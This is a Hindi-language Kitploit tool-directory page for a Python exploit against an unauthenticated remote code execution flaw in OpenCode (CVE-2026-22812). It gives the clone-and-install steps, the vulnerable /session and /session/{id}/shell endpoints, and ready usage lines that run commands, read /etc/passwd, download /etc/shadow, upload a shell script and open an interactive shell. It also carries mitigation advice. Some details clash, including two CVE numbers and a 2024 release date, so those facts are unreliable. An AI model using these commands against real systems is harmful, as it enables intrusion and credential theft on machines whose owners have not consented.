Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22812 — Python exploit टूल OpenCode RCE (CVE-2026-22812) के लिए, जो कमांड निष्पादन, फ़ाइल पढ़ने/लिखने/अपलोड/डाउनलोड, और अधिकृत पेनिट्रेशन टेस्टिंग के लिए इंटरैक्टिव शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Python exploit टूल OpenCode RCE (CVE-2026-22812) के लिए, जो कमांड निष्पादन, फ़ाइल पढ़ने/लिखने/अपलोड/डाउनलोड, और अधिकृत पेनिट्रेशन टेस्टिंग के लिए इंटरैक्टिव शेल प्रदान करता है।

रिपॉजिटरी देखें
217 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22812

अवलोकन

OpenCode रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता के लिए एक Python शोषण उपकरण, जो v1.0.216 से पहले के संस्करणों को प्रभावित करता है। यह उपकरण कई हमले वेक्टर प्रदान करता है, जिनमें कमांड निष्पादन, फ़ाइल पढ़ना/लिखना, फ़ाइल अपलोड/डाउनलोड और इंटरैक्टिव शेल शामिल हैं।

अस्वीकरण

⚠️ केवल अधिकृत परीक्षण के लिए ⚠️

  • यह उपकरण केवल वैध सुरक्षा परीक्षण और अधिकृत पेनेट्रेशन परीक्षण के लिए है
  • केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है
  • लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और कानून द्वारा दंडनीय है

विशेषताएं

  • भेद्यता पहचान: जांचें कि लक्ष्य भेद्य है या नहीं
  • कमांड निष्पादन: लक्ष्य पर मनमाने कमांड निष्पादित करें
  • फ़ाइल संचालन: फ़ाइलें पढ़ें, लिखें, अपलोड करें और डाउनलोड करें
  • इंटरैक्टिव शेल: टैब पूर्णता के साथ पूर्ण इंटरैक्टिव शेल
  • सिस्टम टोही: सिस्टम जानकारी एकत्र करें
  • प्रॉक्सी समर्थन: HTTP प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें
  • आंकड़े ट्रैकिंग: शोषण गतिविधियों की निगरानी करें

स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# निर्भरताएं स्थापित करें
pip install requests urllib3

# निष्पादन योग्य बनाएं (वैकल्पिक)
chmod +x CVE-2026-22812.py

आवश्यकताएं

  • Python 3.6+
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी

उपयोग

root@kitploit:~
python3 CVE-2026-22812.py -t http://target:port [options]

बुनियादी उदाहरण

root@kitploit:~
# जांचें कि लक्ष्य भेद्य है या नहीं
python3 exploit.py -t http://10.0.0.1:4096 --check

# इंटरैक्टिव शेल
python3 exploit.py -t http://10.0.0.1:4096 -i

# एकल कमांड निष्पादित करें
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# फ़ाइल पढ़ें
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# फ़ाइल अपलोड करें
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# फ़ाइल डाउनलोड करें
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# सिस्टम जानकारी प्राप्त करें
python3 exploit.py -t http://10.0.0.1:4096 --info

# प्रॉक्सी का उपयोग करें (Burp Suite, आदि)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

इंटरैक्टिव शेल कमांड

इंटरैक्टिव शेल (-i फ्लैग) में एक बार, आप उपयोग कर सकते हैं:

root@kitploit:~
<command>                   शेल कमांड निष्पादित करें
help                       सहायता मेनू दिखाएं
exit                       शेल से बाहर निकलें
session                    सत्र आईडी दिखाएं
stats                      शोषण आंकड़े दिखाएं
read <file>                फ़ाइल सामग्री पढ़ें
download <remote> <local>  फ़ाइल डाउनलोड करें
upload <local> <remote>    फ़ाइल अपलोड करें
sysinfo                    सिस्टम जानकारी प्राप्त करें

भेद्यता विवरण

  • CVE ID: CVE-2026-22812 / CVE-2026-22182
  • उत्पाद: OpenCode
  • प्रभावित संस्करण: < v1.0.216
  • भेद्यता प्रकार: रिमोट कोड एक्ज़ीक्यूशन
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण: आवश्यक नहीं

तकनीकी विवरण

भेद्यता सत्र प्रबंधन एंडपॉइंट (/session) में मौजूद है, जो बिना प्रमाणीकरण के उपयोगकर्ताओं को सत्र बनाने और /session/{id}/shell एंडपॉइंट के माध्यम से मनमाने कमांड निष्पादित करने की अनुमति देता है।

शोषित एंडपॉइंट:

  1. POST /session - सत्र बनाएं
  2. POST /session/{id}/shell - कमांड निष्पादित करें
  3. GET /file/content - फ़ाइलें पढ़ें

शमन

  1. OpenCode संस्करण ≥ v1.0.216 में अपग्रेड करें
  2. उचित प्रमाणीकरण और प्राधिकरण लागू करें
  3. OpenCode इंस्टेंस तक नेटवर्क पहुंच प्रतिबंधित करें
  4. इनपुट सत्यापन और स्वच्छता लागू करें
  5. वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें

कोड संरचना

root@kitploit:~
CVE-2026-22812.py
├── Colors class (ANSI रंग कोड)
├── print_banner() (बैनर प्रदर्शित करें)
├── Exploit class (मुख्य शोषण तर्क)
│   ├── __init__() (आरंभीकरण)
│   ├── check_vuln() (भेद्यता जांच)
│   ├── create_session() (सत्र बनाएं)
│   ├── exec_cmd() (कमांड निष्पादित करें)
│   ├── read_file() (फ़ाइल पढ़ें)
│   ├── write_file() (फ़ाइल लिखें)
│   ├── upload() (फ़ाइल अपलोड करें)
│   ├── download() (फ़ाइल डाउनलोड करें)
│   ├── get_info() (सिस्टम जानकारी)
│   ├── shell() (इंटरैक्टिव शेल)
│   └── सहायक विधियां
└── main() (तर्क पार्सिंग)

लाइसेंस

यह उपकरण केवल शैक्षिक उद्देश्यों के लिए जारी किया गया है। अपने जोखिम पर उपयोग करें।

लेखक

  • GitHub: 0xgh057r3c0n
  • उपकरण: CVE-2026-22812 शोषण उपकरण

योगदान

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने परिवर्तन कमिट करें
  4. ब्रांच पर पुश करें
  5. एक पुल रिक्वेस्ट बनाएं

आभार

  • भेद्यता खोजने वाले सुरक्षा शोधकर्ता
  • ओपन सोर्स समुदाय
  • सभी योगदानकर्ता और परीक्षक

संदर्भ

  • OpenCode सुरक्षा सलाह
  • CVE डेटाबेस
  • NVD प्रविष्टि

समर्थन

समस्याओं और प्रश्नों के लिए, कृपया:

  1. मौजूदा GitHub मुद्दों की जांच करें
  2. विस्तृत विवरण के साथ एक नया मुद्दा बनाएं
  3. लक्ष्य URL (यदि संभव हो) और त्रुटि संदेश शामिल करें

संस्करण इतिहास

  • v1.0.0 (2024-01-20): प्रारंभिक रिलीज़
    • भेद्यता पहचान
    • कमांड निष्पादन
    • फ़ाइल संचालन
    • इंटरैक्टिव शेल
    • प्रॉक्सी समर्थन
टूल डाउनलोड करें